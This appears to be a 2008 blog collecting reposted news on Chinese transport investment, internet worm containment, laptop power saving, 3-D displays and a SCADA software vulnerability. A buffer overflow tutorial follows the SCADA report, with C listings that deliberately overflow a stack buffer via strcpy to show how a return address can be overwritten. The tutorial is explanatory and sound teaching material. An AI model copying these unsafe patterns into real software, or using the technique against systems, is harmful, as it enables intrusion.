Friday, June 13, 2008

5000 Kilometer Autobahn im Jahr

Verkehr in China

5000 Kilometer Autobahn im Jahr

Von Dyrk Scherff

12. Juni 2008 Canning Wang besitzt jetzt ein Auto. Zum ersten Mal in seinem Leben - mit 44 Jahren. Damit fährt er jeden Tag zur Arbeit in die Außenbezirke von Peking. „Auf mein Fahrrad, das ich früher oft benutzt habe, setze ich mich jetzt nur noch am Wochenende“, sagt Wang.

Zwei Jahresgehälter hat ihn der kleine Citroën aus chinesischer Produktion gekostet. Während in Deutschland schon viele Studenten mit eigenem Wagen herumfahren, musste Wang nach der Uni mehr als zehn Jahre arbeiten, bevor sein Traum in Erfüllung ging. Doch Beispiele wie das von Wang werden schnell mehr. Es ist typisch für die rasch wachsende Mittelschicht in China, dass sie sich ein eigenes Auto leisten kann. Und es sich auch tatsächlich kauft. In den vergangenen drei Jahren ist die Zahl der Autos um 60 Prozent gestiegen, aber noch immer haben erst 8 Prozent der Haushalte einen eigenen Wagen.

Gehaltssteigerungen von teilweise zehn Prozent und mehr im Jahr machen den raschen Zuwachs möglich. Das Durchschnittseinkommen liegt nahe an der Schwelle von 2000 Euro, über der die Motorisierung nach den Erfahrungen in anderen asiatischen Ländern sprunghaft zunimmt. Aus dem Fahrrad- und Mopedland wird die Autonation China, vier statt zwei Räder lautet das Motto. Die Rikscha wird in den Städten nur noch für Touristen gebraucht.

Auf der neuen Strecke nach Tibet Im aktuellen Fünf-Jahres-Plan von 2006 bis 2010 fließen 350 Milliarden Euro i... Der deutsche Transrapid verkehrt bislang nur auf wenigen Kilometern in Schanghai Das neue Terminal des Flughafens in Peking hat Stararchitekt Norman Foster en...

Dramatisch wird das Stauproblem durch den Gütertransport

Für die Verkehrsinfrastruktur ist das eine gewaltige Herausforderung. Schon jetzt kommen die Autos in den Millionenstädten Peking oder Schanghai selbst auf den großen achtspurigen Straßen oft nur im Joggingtempo voran - und das den ganzen Tag, nicht nur zur Hauptverkehrszeit. Die Fahrräder auf den Extraspuren rollen bequem an ihnen vorbei. So hat Wang zwar jetzt ein Auto, aber schneller ist er trotzdem nicht. Die Flucht in die Städte verschärft die Situation zusätzlich.

Richtig dramatisch wird das Stauproblem aber durch den Gütertransport. Das rasante Wachstum von Chinas Wirtschaft von durchschnittlich zehn Prozent im Jahr erhöht auch die zu transportierenden Mengen enorm. Und verstopft die Straßen weiter, denn 70 Prozent davon übernehmen Lastwagen, weil sie billiger und schneller sind als die Bahn.

Die Eisenbahnen leiden unter fehlenden Terminals, an denen Container vom Lastwagen auf die Schiene umgeladen werden können. Zudem sind die Streckenkapazitäten viel zu klein. Das hat Folgen: Kohletransporte für die Energieproduktion und vor Feiertagen und am Wochenende auch Passagierfahrten genießen Vorrang, die Containerzüge haben zu warten, klagen westliche Speditionen, die in China aktiv sind.

350 Milliarden Euro werden bis 2010 investiert

Der Straßenverkehr kann das nur auf den Autobahnen ausgleichen, die im dichtbesiedelten und industrialisierten Osten und Süden europäische Maßstäbe erreichen. „Nördlich von Hongkong sind sie sogar schon für die nächsten zwei Jahrzehnte ausgebaut“, erklärt Achim Haug, China-Experte bei der Bundesagentur für Außenwirtschaft. Die Autobahnen sind mautpflichtig. Bei üppigen Preisen von rund 15 Euro für 300 Kilometer halten sie offenbar auch einige Autos ab, der Verkehr fließt besser als in der Stadt. „Je weiter man freilich in den Westen Chinas fährt, desto schlechter wird die Straßenqualität, vor allem nach Verlassen der Schnellstraße“, sagt Haug.

Die chinesische Regierung hat die Engpässe erkannt und investiert gewaltige Summen, damit sie nicht zum Hindernis für den weiteren wirtschaftlichen Aufstieg Chinas werden. Die Dimensionen sind für Deutsche kaum vorstellbar. Im aktuellen Fünf-Jahres-Plan von 2006 bis 2010 fließen 350 Milliarden Euro in den Ausbau der Verkehrsinfrastruktur, doppelt so viel wie in den fünf Jahren zuvor. Zum Vergleich: Deutschland wird in diesem Zeitraum 56 Milliarden Euro verbauen, der ganze Bundeshaushalt 2008 macht nur 280 Milliarden aus.

Kein anderes Land der Welt kann mit dem chinesischen Tempo mithalten. Selbst das schnell wachsende Indien investiert nur die Hälfe davon. Unter den Schwellenländern der Erde steht China schon für 40 Prozent aller Infrastrukturausgaben. Noch nie in der Geschichte hat ein Land so viel in Verkehrsprojekte gesteckt. Es übertrifft selbst die Dimensionen, die im 19. Jahrhundert Großbritanniens Eisenbahneuphorie während der Industrialisierung auslöste. China vollzieht diese Entwicklung Europas jetzt nach - nur viel schneller und dynamischer.

Auch der Westen soll besser erschlossen werden

Die Chinesen arbeiten mit immenser Geschwindigkeit. Dank schneller Planung ohne Einspruchsmöglichkeiten der Bevölkerung stellt das Land im Jahr fast 5000 Kilometer neue Autobahn fertig, in drei Jahren so viel, wie in Deutschland überhaupt existieren. Das Netz umfasst mittlerweile 53 000 Kilometer und ist schon jetzt das zweitgrößte der Welt nach den Vereinigten Staaten. Vor zehn Jahren gab es in China gerade einmal 7000 Kilometer.

Ziel des Ausbaus der Verkehrsinfrastruktur ist dabei nicht nur, Engpässe im Osten zu beseitigen. Auch der Westen soll besser erschlossen werden. Aus politischen Gründen, um mehr Regionen und Menschen am wirtschaftlichen Erfolg des Landes teilhaben zu lassen. „Aufbau einer harmonischen Gesellschaft“ nennt das die Regierung. Und aus wirtschaftlichen Gründen. Denn im Osten werden die hohen Grundstückspreise, stark steigende Gehälter und das Fehlen qualifizierter Arbeitskräfte zum Problem und zwingen Teile der Wirtschaft, in den billigeren Westen abzuwandern. Hier beträgt der Lohn nur zehn Prozent des Ostniveaus. Straße und Schiene folgen der Wirtschaft.

Schließlich sollen die Investitionen auch endlich die Bahn voranbringen. Sie steht vor einer Renaissance. Dabei geht es ähnlich schnell zu wie beim Straßenbau. Von 2006 bis 2010 werden 17.000 Kilometer neue Strecken gebaut, in Deutschland werden es keine 200 sein. Einige gigantische Projekte sind schon fertig, wie die 1100 Kilometer lange Strecke nach Tibet, die wegen ihrer extremen Höhenlage in den Bergen des Himalaja sehr teuer wurde. Weitere mehr als tausend Kilometer nach Nordwesten quer durch die Berge der annektierten Provinz sind geplant. Genauso kühn erscheint eine 150 Kilometer lange Meeresbrücke nach Taiwan, falls sich die politischen Verhältnisse zwischen beiden Ländern weiter entspannen.

Der deutsche ICE verbindet bald Peking und Schanghai

In Aufbau ist zudem ein 10.000 Kilometer langes Hochgeschwindigkeitsnetz im Osten des Landes, auf dem Personenzüge mit bis zu 350 Stundenkilometern dahinrasen werden. Bisher sind allenfalls 200, in Ausnahmefällen 250 Stundenkilometer möglich. Die neuen Strecken schaffen auf den bestehenden Gleisen die dringend erforderlichen Kapazitäten für den Gütertransport.

Anfang August, kurz vor dem Beginn der Olympischen Spiele, geht ein kleiner Teil des Netzes in Betrieb und wird zur bisher schnellsten Strecke in China. Sie verbindet Peking mit der Küstenstadt Tianjin, in der die Segelwettbewerbe stattfinden. Auf dieser Strecke kommt der deutsche ICE mit Tempo 300 zum Einsatz. Er wird 2009 auch auf der neuen Linie zwischen Peking und Schanghai unterwegs sein. 60 Züge hat die Regierung bestellt. Bisher fahren schon Exemplare des japanischen Schnellzuges Shinkansen und ein Modell von Bombardier durch den Osten.

Der deutschen Magnetschwebebahn Transrapid verhilft der Infrastrukturboom bisher hingegen nicht zum Durchbruch. Sie verkehrt weiter nur auf wenigen Kilometern in Schanghai. Die lange diskutierte und vage vereinbarte Verlängerung ins Zentrum der Millionenmetropole und nach Hangzhou ist noch immer nicht endgültig beschlossen. Zuletzt behinderten Bürgerbeschwerden aus Angst vor Lärm eine Entscheidung der Regierung. Deutsche Experten in Peking erwarten, dass ein Beschluss erst nach den Olympischen Spielen oder möglicherweise sogar erst nach der Weltausstellung Expo 2010 in Schanghai fällt, denn die Staatsführung will neue Klagen aus der Bevölkerung vor diesen beiden Großereignissen vermeiden. Das Transrapid-Konsortium wartet seit langem auf die Verlängerung, um die internationalen Vermarktungschancen des Zuges zu verbessern.

Innerhalb von fünf Jahren baut China 44 Flughäfen

Schiene und Straße machen etwa 80 Prozent der gesamten Verkehrsinvestitionen von 2006 bis 2010 aus. Für den Export wichtig sind auch die Häfen an der Ostküste, die das Land mit dem Rest der Welt verbinden. Schon jetzt liegen drei der vier größten Containerhäfen der Erde in China. Mit ihrem Mengenwachstum von mehr als 20 Prozent im Jahr dürften sie spätestens im kommenden Jahr Singapur vom ersten Platz verdrängen. Daher werden auch hier Milliarden investiert.

Genauso wie in die Flughäfen. Während in Deutschland allein für die neue Landebahn des Frankfurter Flughafens zehn Jahre geplant wurde, werden in China in kürzerer Zeit mehrere komplette Airports gebaut, vor allem im Westen. 44 neue Landeplätze werden zwischen 2006 und 2010 fertiggestellt. 186 hat dann das Land, zehn davon werden zudem ausgebaut. Peking dürfte zu einem wichtigen Drehkreuz in ganz Asien werden. Nach Passagierzahlen hat der Flughafen mit Frankfurt gleichgezogen. Das gerade eröffnete, von Stararchitekt Norman Foster entworfene neue Terminal 3 in Drachenform hat daran einen großen Anteil. Die aus dem Ausland einschwebenden Gäste der Olympischen Spiele werden für einen weiteren Sonderschub sorgen. Nur im Frachtgeschäft hinken Chinas Flughäfen noch weit hinterher, wachsen aber schnell, um bis 30 Prozent im Jahr. Sie könnten davon profitieren, dass China zunehmend Hochtechnologie produzieren will, die vorzugsweise per Luft befördert wird.

All die gigantischen Investitionen in die Verkehrsinfrastruktur kann sich China nur leisten, weil die Steuereinnahmen durch den Wirtschaftsaufschwung kräftig sprudeln. Das Haushaltsdefizit fiel von 2,6 Prozent im Jahr 2002 auf derzeit fast null. Das eröffnet größere finanzielle Spielräume, reicht aber nicht aus. Die Regierung will die Mittel auch durch die Beteiligung von Privatunternehmen vor allem aus dem Ausland aufbringen.

Das sind etwa Banken und Versicherungen, die sich an den Infrastrukturunternehmen wie dem börsennotierten Bahnbauer China Railway Group, dem Autobahnbetreiber Shenzhen Expressway oder dem Hafen Dalien Port beteiligen. Oder die Deutsche Bahn, die über ihre Logistiktochter DB Schenker am Aufbau von 18 Containerterminals in China mitwirkt. „Dadurch bekommen wir die Transportmengen auf die Schiene, die wir für den wirtschaftlichen Betrieb der geplanten Eisenbahn-Landbrücke zwischen Asien und Europa brauchen“, umreißt Bahnchef Hartmut Mehdorn die Bedeutung für sein Unternehmen.

Canning Wang interessieren solche Baumaßnahmen mit globalem Hintergrund kaum. Er steht weiter mit seinem Citroën im Stau von Peking. Und hofft, dass sich auch in der Hauptstadt bald mehr bewegt - im wahren Sinne des Wortes. Die Hoffnung ist begründet. Bis 2020 wird sich die Länge des U-Bahn-Netzes verfünffachen - auf 560 Kilometer. Mehr wird dann wohl keine Stadt der Welt haben. Das schafft vielleicht Platz auf der Straße. Damit Wang endlich vorankommt.

Deutsche Unternehmen liefern Züge, befestigen Schienen und statten Flughäfen aus

Siemens

Der Münchner Konzern ist sicher der größte deutsche Profiteur der gewaltigen Verkehrsinvestitionen in China. Bis 2010 liefert Siemens 60 Velaro-Hochgeschwindigkeitszüge, eine etwas breitere und schnellere Version des ICE 3, der in Deutschland zum Beispiel zwischen Köln und Frankfurt unterwegs ist. Sie können bis zu 350 Stundenkilometer fahren und werden in einem Gemeinschaftsunternehmen in China gefertigt. Die wichtigen Komponenten wie der Antrieb kommen aber aus Deutschland. 670 Millionen Euro nimmt Siemens dadurch ein. Die ersten fünf Züge sind von August an auf der Strecke zwischen Peking und der Küstenstadt Tianjin im Einsatz. Dafür hat das Unternehmen auch die Signal- und Kommunikationstechnik geliefert. 2007 bestellte China zudem 500 elektrische Frachtlokomotiven im Wert von 334 Millionen Euro. Zudem rüstet Siemens für 30 Millionen Euro die U-Bahn-Linie aus, die zum Pekinger Olympiagelände führt. Schon in der Vergangenheit installierte Siemens für mehrere chinesische U-BahnSysteme die Signal- und Betriebsleittechnik und lieferte Metro-Wagen. Zudem hofft der Konzern auf die Verlängerung der Transrapid-Strecke in Schanghai, für die Siemens die elektronische Ausrüstung liefern würde.

Thyssen-Krupp

Der Konzern ist der andere Partner im Transrapid-Konsortium. Er ist für den Magnetantrieb verantwortlich. Darüber hinaus fahren die Fluggäste im neuen Terminal 3 des Pekinger Flughafens in Aufzügen und auf Fahrtreppen von Thyssen-Krupp. Die wurden auch auf Bahnhöfen installiert. Zudem gehen die Flugpassagiere in Peking und Schanghai über Fluggastbrücken von Thyssen in ihre Maschinen. Das Unternehmen ist weltweit der erste Anbieter für die Fertigung und Einrichtung von Fluggastbrücken für den neuen Riesen-Airbus A380.

Vossloh

Der Bahnzulieferer fertigt die Befestigungsklemmen, mit denen auf zwei Schnellbahnstrecken die Schienen mit den Betonschwellen fest verbunden werden. Sie werden in einem eigenen Werk in China produziert. Der Auftrag hat für die Geschäftssparte Vossloh Fastening eine enorme Bedeutung: Er macht mit einem Volumen von 185 Millionen Euro mehr als 40 Prozent des Umsatzes während der zweijährigen Vertragslaufzeit aus. Im gesamten Konzern sind es immerhin noch rund 7 Prozent.

Containing Internet Worms

Thursday, June 12, 2008

Containing Internet Worms

A new method could stop Internet worms from spreading.

By Erica Naone

The spread of Internet worms could be stopped early on by using a new method to watch computers for the behavior exhibited by infected hosts, according to research recently published in IEEE Transactions on Dependable and Secure Computing. Although other methods exist to protect against worms, the new strategy is designed to minimize interference with users' normal work patterns, says Ness Shroff, a professor in the electrical-engineering department at Ohio State University, who was involved in the research. The researchers envision the technique being used in corporate networks, where it could identify computers that need to be quarantined and checked for infection.

Internet worms can be enlisted to launch denial-of-service attacks, which flood a website so that legitimate users can't access it, or install back doors that can be used to create botnets. Large numbers of infected computers could significantly slow Internet traffic, even if the worms do nothing more than spread.

Credit: Technology Review

The Purdue University and Ohio State method of preventing worms from spreading works primarily for a class of worms that scans the Internet randomly in search of vulnerable host machines to infect. One such worm was Code Red, which infected more than 359,000 computers in less than 14 hours in 2001, and ultimately caused an estimated $2.6 billion in damages. Although this type of worm has been around for some time, Kurt Rohloff, a scientist in the distributed systems technology group at BBN Technologies, says that it is still dangerous. These "are a very simple class of worms that's very easy to develop and program, but at the same time, they're not as easy to contain," he says. "If we could understand these fairly simple but still problematic worms, we could hopefully address the more so-called devious worms."

The researchers base their strategy on a new model that they designed for how worms spread. Many existing models are based on an analogy to the spread of epidemics, Shroff says, but they are more accurate at later stages of an infection. The researchers' model was particularly designed for accuracy in the early stages of infection, and it revealed that the key to whether or not a worm can spread successfully is the total number of times that an infected host scans the Internet in attempts to find new hosts to infect.

While other methods of containing worms have focused on monitoring computers for changes in the rate at which they scan the Internet from moment to moment, Shroff says that this can interfere with users' daily activities. "Scan rates fluctuate a lot, so if you go online, you may scan a lot of times during a very short period of time, and then not scan at all," he says. "We felt that the scan rate was too restrictive and could interfere with the normal operation of the network." By monitoring the volume of scans over a longer period of time, he says, it's possible to contain worms while keeping the threshold too high for ordinary users to raise alarms. Software could monitor the number of scans each computer on a network sends and quarantine any computers that exceed that number. Shroff hopes that changing the criteria for suspecting infection in this way will reduce the likelihood that legitimate scans of the Internet would be flagged as worm activity.

"In a sense, what we're doing is taking advantage of the fact that this worm is trying a lot of things and missing many times, and each time it misses, it's giving out some information," Shroff says. Although the system is designed for dealing with scanning worms that seek vulnerable hosts at random, the researchers have also adapted it for worms that target their attacks at specific local networks.

Shroff believes that the system could best be deployed on corporate networks, particularly in situations in which extra computers are available that could cover a workload while possibly infected computers are examined. It might not work as well for small businesses or on home networks, because taking a computer offline could be too large of a disruption for users, he says.

Rohloff says that he could imagine such a system being effective, but he cautions, "The bias, of course, would be that it would protect local networks from infections that are already present in the network. It wouldn't do as much for protecting networks from infections that come from the outside." He adds that while the researchers' model and initial simulations look good, he would be curious to see a more thorough analysis of how often the system suspects a computer of being infected with a worm when no worm is actually present.

The Purdue and Ohio State researchers suggest that future work could search for ways to adapt their tools for ever more targeted worms. Shroff says that while he and his colleagues are now concentrating on stopping worms at the level of host computers, another possible direction could be to make software that would allow routers to watch for suspicious traffic patterns. While such an approach could allow a relatively large number of computers to be monitored from a single point, it would also require significant changes to how routers operate. While they currently keep track of only the destination of Internet traffic, they would have to begin keeping track of its source as well.

Doubling Laptop Battery Life

Friday, June 13, 2008

Doubling Laptop Battery Life

Intel's new integrated power management could dramatically reduce power consumption in your laptop by shutting down operations not being used.

By Kate Greene

Anyone who uses a laptop on an airplane would love a single battery to last through a trans-American flight. Now researchers at Intel believe that they can double a laptop's battery life without changing the battery itself. Instead, they would optimize power management--system wide--of the operating system, screen, mouse, chips inside the motherboard, and devices attached to USB ports.

To be sure, manufacturers and researchers have been exploring piecemeal ways to make portable computers more energy efficient. Operating systems are designed to deploy power-saving screen savers and put an entire system to sleep if its owner hasn't used it after a while. And Intel's forthcoming Atom, a microprocessor for mobile Internet devices, can be put to sleep at up to six different levels, depending on the types of tasks that it needs to do.

But the problem with these approaches is that they're not coordinated across the entire device. Intel's prototype power-management system is aware of the power that's used by all parts of a laptop, as well as the power requirements of a person's activity, and it shuts down operations accordingly, says Greg Allison, business development manager. The project, called advanced platform power management, was demonstrated on Wednesday at an Intel event in Mountain View, CA.

Power bars: Intel Research engineers yesterday showed off prototype methods for system-wide laptop power savings. Using the current implementation, average power consumption of a laptop can be reduced from 6.23 to 4.02 watts. The researchers believe that the approach has the capacity to slash up to 50 percent of laptop power consumption.
Credit: Kate Greene

Allison gives this example: today, when a person reads a static e-mail, the screen still refreshes 60 times a second, and peripherals such as the keyboard, mouse, and USB devices drain battery power while awaiting instructions. "We're burning energy even when we don't need to," Allison says. In this situation, Intel's system would save power by essentially taking a snapshot of the screen that a person is reading and saving it to a buffer memory. So instead of refreshing, the screen would maintain an image until a person tapped a button on the keyboard or moved the mouse (the keyboard and mouse would also stay asleep until activated).

All the while, the operating system will be monitoring use of other applications, restricting operations to those that aren't being actively used. And if there are any devices plugged into a USB port, such as a flash-memory stick, the system would put them to sleep. At the same time, explains Allison, energy-monitoring circuits on Intel chips will put unnecessary parts of the microprocessor to sleep. It takes 50 milliseconds for the entire system to spring to life, he says, a length of time imperceptible to the user.

Intel isn't the first to think of the idea of integrating power-saving technology throughout a device. One Laptop per Child (OLPC), the nonprofit that builds inexpensive, rugged laptops meant for children in the developing world, set the standard with a gadget that consumes one-tenth of the power of a conventional laptop. Granted, OLPC's laptop doesn't have the capabilities of consumer machines, but it does show what is technically achievable.

There are definitely advantages to this systemic approach, says Seth Sanders, a professor of electrical engineering and computer science at the University of California, Berkeley. "Comprehensively looking through the system at all of the different pieces that are cycling unnecessarily provides an opportunity [for power savings]," he says.

Allison says that the company is already talking with operating-system vendors to explore what it would take to integrate this approach into software. And as a major contributor to the new USB 3.0 standards, Intel will have some say in how much power forthcoming USB devices will use. In addition, Allison says, the company is trying to secure deals with display and hardware vendors. "This won't happen in the next three years," he says. But he suspects that pieces of the new power-management system will find their way into laptops within five years.



Thursday, June 12, 2008

3-D Viewing without Goofy Glasses

Thursday, June 12, 2008

3-D Viewing without Goofy Glasses

Philips's new displays bring high-quality, 3-D images a step closer to your living room.

By John Borland

With the release of a new set of 3-D video screens next week, Philips Electronics is bringing a sci-fi cinema standby a little closer to everyday use. Philips' WOWvx displays--which allow viewers to perceive high-quality 3-D images without the need for special glasses--are now beginning to appear in shopping malls, movie-theater lobbies, and theme parks worldwide.

The technology uses image-processing software, plus display hardware that includes sheets of tiny lenses atop LCD screens. The lenses project slightly different images to viewers' left and right eyes, which the brain translates into a perception of depth. For now, the screens are expensive and not yet marketed for home use. But Philips, which first released the technology in 2006, is working on technical improvements that will make the screens better suited for the home.

"We think this is a huge leap," says Wolf-Nils Malchow, production manager for the Munich-based Kuk Filmprodukion, an early producer of content for the displays and of promotional films for clients such as Deutsche Telekom. "It is a bit like a few years ago, when [high-definition video] kicked in. Everyone is excited about it."

Small-screen 3-D: This is an artistic rendering of WOWvx 3-D screens, which are coated with lenses that project slightly differing images, allowing viewers to perceive depth without wearing 3-D glasses.
Credit: Courtesy of Philips

A planned deployment of about 50 screens in U.S. theater lobbies has begun at the Bridge Theater in Los Angeles. South African shopping malls have ordered about 350 of the screens. Other rollouts include malls and coffee shops in Russia, European casinos, and theme parks, the company says. And at next week's Infocomm trade fair in Las Vegas, new 52-inch and 22-inch options will be added to the existing 42-inch model.

This isn't the first time that 3-D has made a splash. The early 1950s and early 1980s each saw their own fads. The 3D movies from the 1950s were filmed with two cameras, with the separate images then projected simultaneously. The familiar red-and-blue-lensed glasses were used to trick the eyes into interpreting color differences as distance. Modern 3-D movies employ more-sophisticated approaches, such as projecting the separate images in polarized light and using glasses with polarized lenses that filter out one image on each side.

But a combination of advances in computer image processing and industrial optics has allowed companies like Philips to develop their glasses-free technique.

As with earlier techniques, the illusion requires specially-created content to start with. In this case, a digital movie file effectively has two frames for each ordinary movie frame. The first is an ordinary color image, identical to what would be seen on a two-dimensional screen. A second frame, rather than showing a second offset view, encodes information about how viewers should perceive depth in the first frame. It appears as a grayscale version of the first, with white indicating foreground objects, black denoting deep background, and shades of gray indicating points in between.

Capturing 3-D: Philips's WOWvx screens require specially created videos that record two frames for each scene. The first frame contains ordinary color information. The second frame contains depth information for each pixel, with white denoting foreground and black indicating deep background. Software and hardware built into the screens then use this information to create differing versions of images as the video plays and send them to the display. In a final step, lenses atop the screen project these slightly-differing images so that the left and right eyes see different versions, creating the illusion of depth.
Credit: Courtesy of Philips

Then, special PC-based hardware and software--housed in the display itself--processes the pair of images as the video is played. The information in the second frame is used to transform the original color frame into nine separate images, each slightly offset from the last, as though the camera had been moved a few inches to the side each time. All nine are then sent to the screen.

To allow viewers to perceive these images, the LCD screens are overlaid with three-pixel-wide cylindrical lenses that direct the different images into side-by-side paths. A nearby viewer will see one of these images with each eye--the first and third, or third and fifth, for example--thus producing the illusion of image depth.

The multiple images allow viewers to walk around the viewing area--a cone about 20 degrees wide--without disturbing the 3-D illusion, says Philips product manager Erik van der Tol. This cone is duplicated several times on each screen, further widening the 3-D viewing area.

The number of content producers working with the format is small, but growing. Kuk creates live-action stereoscopic films, using two cameras to film. Others, such as the London-based SquareZero, work primarily with computer graphics, which requires a less specialized production process.

"You do get really good depth perception," says SquareZero head of animation Olly Tyler. "The image seems to go into the screen and come out of it."

As with any new technology, there are glitches. With the company's 42-inch screens, the 3-D effect works most effectively only up to a distance of about 12 feet, and if you view the screen at the boundary between the three "cones," you experience garbled images. In addition, the quality of ordinary two-dimensional images on the screens is diminished. Finally, a 42-inch screen will set you back $12,000 (prices on the new 52-inch and 22-inch models being released next week have not yet been specified).

Still, while today the company is focusing squarely on the advertising and display market, it does have its eye on the consumer market. Researchers are working on expanding and smoothing the viewing area and on improving the two-dimensional viewing quality in order to make the screens entirely backward-compatible with ordinary video.

"Look a couple of years ahead, and I think this will be an acceptable technology for the home," says van der Tol. "The Hollywood scene is definitely interested." Philips is not alone; Sharp Electronics, along with a handful of small companies such as Dimension Technologies and Alioscopy, offer competing products.

Security hole exposes utilities to Internet attack

Wednesday, June 11, 2008

Security hole exposes utilities to Internet attack

By Associated Press

SAN FRANCISCO (AP) _ Attackers could gain control of water treatment plants, natural gas pipelines and other critical utilities because of a vulnerability in the software that runs some of those facilities, security researchers reported Wednesday.

Experts with Boston-based Core Security Technologies, who discovered the deficiency and described it exclusively to The Associated Press before they issued a security advisory, said there's no evidence anyone else found or exploited the flaw.

Citect Pty. Ltd., which makes the program called CitectSCADA, patched the hole last week, five months after Core Security first notified Citect of the problem.

But the vulnerability could have counterparts in other so-called supervisory control and data acquisition, or SCADA, systems. And it's not clear whether all Citect clients have installed the patch.

SCADA systems remotely manage computers that control machinery, including water supply valves, industrial baking equipment and security systems at nuclear power plants.

Customers that use CitectSCADA include natural gas pipelines in Chile, major copper and diamond mines in Australia and Botswana, a large pharmaceutical plant in Germany and water treatment plants in Louisiana and North Carolina.

For an attack involving the vulnerability that Core Security revealed Wednesday to occur, the target network would have to be connected to the Internet. That goes against industry policy but does happen when companies have lax security measures, such as connecting control systems' computers and computers with Internet access to the same routers.

A rogue employee could also access the system internally.

Security experts say the finding highlights the possibility that hackers could cut the power to entire cities, poison a water supply by disrupting water treatment equipment, or cause a nuclear power plant to malfunction by attacking the utility's controls.

That possibility has grown in recent years as more of those systems are connected to the Internet.

The Citect vulnerability is of a common type. Called a "buffer overflow," it allows a hacker to gain control of a program by sending a computer too much data.

"It's not a very elaborate problem," Ivan Arce, Core Security's chief technology officer, said in an interview. "If we found this thing -- and this was not that hard -- it would be easy for someone else to do it."

Citect is a subsidiary of French power-equipment giant Schneider Electric SA. Company representatives did not return repeated calls for comment.

Citect said in a statement included in Core Security's advisory that customers should isolate their SCADA systems entirely from the Internet or make sure they use firewalls and other technologies to prevent the systems from talking to the outside world.

Normally, the facilities that use SCADA systems fix flaws privately and very little is revealed publicly about any problems.

What's clear is that such control systems are increasingly vulnerable to Internet-borne threats, since viruses and worms have disrupted service in power plants, automobile factories and gasoline pipelines -- even when those facilities weren't targeted.

Alan Paller, director of research for the SANS Institute, which operates the Internet Storm Center, an early warning system for computer attacks, said Core Security Technologies' discovery shows many major facilities may remain vulnerable.

"It dashes the defense of, 'We're different, we don't have that kind of problem,'" Paller said. "That's why this is significant."

--------------------------------------------------------------------------------------------

What causes the buffer overflow condition? Broadly speaking, buffer overflow occurs anytime the program writes more information into the buffer than the space it has allocated in the memory. This allows an attacker to overwrite data that controls the program execution path and hijack the control of the program to execute the attacker’s code instead the process code. For those who are curious to see how this works, we will now attempt to examine in more detail the mechanism of this attack and also to outline certain preventive measures.

From experience we know that many have heard about these attacks, but few really understand the mechanics of them. Others have a vague idea or none at all of what an overflow buffer attack is. There also those who consider this problem to fall under a category of secret wisdom and skills available only to a narrow segment of specialists. However this is nothing except for a vulnerability problem brought about by careless programmers.

Programs written in C language, where more focus is given to the programming efficiency and code length than to the security aspect, are most susceptible to this type of attack. In fact, in programming terms, C language is considered to be very flexible and powerful, but it seems that although this tool is an asset it may become a headache for many novice programmers. It is enough to mention a pointer-based call by direct memory reference mode or a text string approach. This latter implies a situation that even among library functions working on text strings, there are indeed those that cannot control the length of the real buffer thereby becoming susceptible to an overflow of the declared length.

Before attempting any further analysis of the mechanism by which the attack progresses, let us develop a familiarity with some technical aspects regarding program execution and memory management functions.

Process Memory

When a program is executed, its various compilation units are mapped in memory in a well-structured manner. Fig. 1 represents the memory layout.

Fig. 1: Memory arrangement

Legend:

The text segment contains primarily the program code, i.e., a series of executable program instructions. The next segment is an area of memory containing both initialized and uninitialized global data. Its size is provided at compilation time. Going further into the memory structure toward higher addresses, we have a portion shared by the stack and heap that, in turn, are allocated at run time. The stack is used to store function call-by arguments, local variables and values of selected registers allowing it to retrieve the program state. The heapmalloc function or the new holds dynamic variables. To allocate memory, the heap uses the operator.

What is the stack used for?

The stack works according to a LIFO model (Last In First Out). Since the spaces within the stack are allocated for the lifetime of a function, only data that is active during this lifetime can reside there. Only this type of structure results from the essence of a structural approach to programming, where the code is split into many code sections called functions or procedures. When a program runs in memory, it sequentially calls each individual procedure, very often taking one from another, thereby producing a multi-level chain of calls. Upon completion of a procedure it is required for the program to continue execution by processing the instruction immediately following the CALL instruction. In addition, because the calling function has not been terminated, all its local variables, parameters and execution status require to be “frozen” to allow the remainder of the program to resume execution immediately after the call. The implementation of such a stack will guarantee that the behavior described here is exactly the same.

Function calls

The program works by sequentially executing CPU instructions. For this purpose the CPU has the Extended Instruction Counter (EIP register) to maintain the sequence order. It controls the execution of the program, indicating the address of the next instruction to be executed. For example, running a jump or calling a function causes the said register to be appropriately modified. Suppose that the EIP calls itself at the address of its own code section and proceeds with execution. What will happen then?

When a procedure is called, the return address for function call, which the program needs to resume execution, is put into the stack. Looking at it from the attacker’s point of view, this is a situation of key importance. If the attacker somehow managed to overwrite the return address stored on the stack, upon termination of the procedure, it would be loaded into the EIP register, potentially allowing any overflow code to be executed instead of the process code resulting from the normal behavior of the program. We may see how the stack behaves after the code of Listing 1 has been executed.

Listing1

void f(int a, int b)

{

char buf[10];

// <-- the stack is watched here

}

void main()

{

f(1, 2);

}

After the function f() is entered, the stack looks like the illustration in Figure 2.

Fig. 2 Behavior of the stack during execution of a code from Listing 1

Legend:

Firstly, the function arguments are pushed backwards in the stack (in accordance with the C language rules), followed by the return address. From now on, the function f() takes the return address to exploit it. f() pushes the current EBP content (EBP will be discussed further below) and then allocates a portion of the stack to its local variables. Two things are worth noticing. Firstly, the stack grows downwards in memory as it gets bigger. It is important to remember, because a statement like this:

sub esp, 08h

That causes the stack to grow, may seem confusing. In fact, the bigger the ESP, the smaller the stack size and vice versa. An apparent paradox.

Secondly, whole 32-bit words are pushed onto the stack. Hence, a 10-character array occupies really three full words, i.e. 12 bytes.

How does the stack operate?

There are two CPU registers that are of “vital” importance for the functioning of the stack which hold information that is necessary when calling data residing in the memory. Their names are ESP and EBP. The ESP (Stack Pointer) holds the top stack address. ESP is modifiable and can be modified either directly or indirectly. Directly – since direct operations are executable here, for example, add esp, 08h. This causes shrinking of the stack by 8 bytes (2 words). Indirectly – by adding/removing data elements to/from the stack with each successive PUSH or POP stack operation. The EBP register is a basic (static) register that points to the stack bottom. More precisely it contains the address of the stack bottom as an offset relative to the executed procedure. Each time a new procedure is called, the old value of EBP is the first to be pushed onto the stack and then the new value of ESP is moved to EBP. This new value of ESP held by EBP becomes the reference base to local variables that are needed to retrieve the stack section allocated for function call {1}.

Since ESP points to the top of the stack, it gets changed frequently during the execution of a program, and having it as an offset reference register is very cumbersome. That is why EBP is employed in this role.

The threat

How to recognize where an attack may occur? We just know that the return address is stored on the stack. Also, data is handled in the stack. Later we will learn what happens to the return address if we consider a combination, under certain circumstances, of both facts. With this in mind, let us try with this simple application example using Listing 2.

Listing 2

#include

char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes

void main()

{

char buf[8];

strcpy(buf, code);

}

